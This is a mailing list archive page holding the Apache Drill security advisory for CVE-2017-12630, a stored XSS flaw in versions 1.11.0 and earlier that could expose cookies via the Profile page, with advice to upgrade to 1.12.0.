drill-user mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Arina Ielchiieva <ar...@apache.org>
Subject [SECURITY] CVE-2017-12630 Apache Drill XSS vulnerability
Date Mon, 18 Dec 2017 10:35:21 GMT
*CVE-2017-12630 Apache Drill XSS vulnerability*

*Severity*: Important

*Vendor:* The Apache Software Foundation

*Versions Affected:*
Apache Drill 1.11.0 and earlier

In Apache Drill 1.11.0 and earlier when submitting form from Query page
users are able to pass arbitrary script or HTML which will take effect on
Profile page afterwards.

After submitting special script that returns cookie information from Query
page, malicious user may obtain this information from Profile page

Users of the affected versions should upgrade to Apache Drill to 1.12.0 and

Sanjog Panda

Kind regards

  • Unnamed multipart/alternative (inline, None, 0 bytes)
View raw message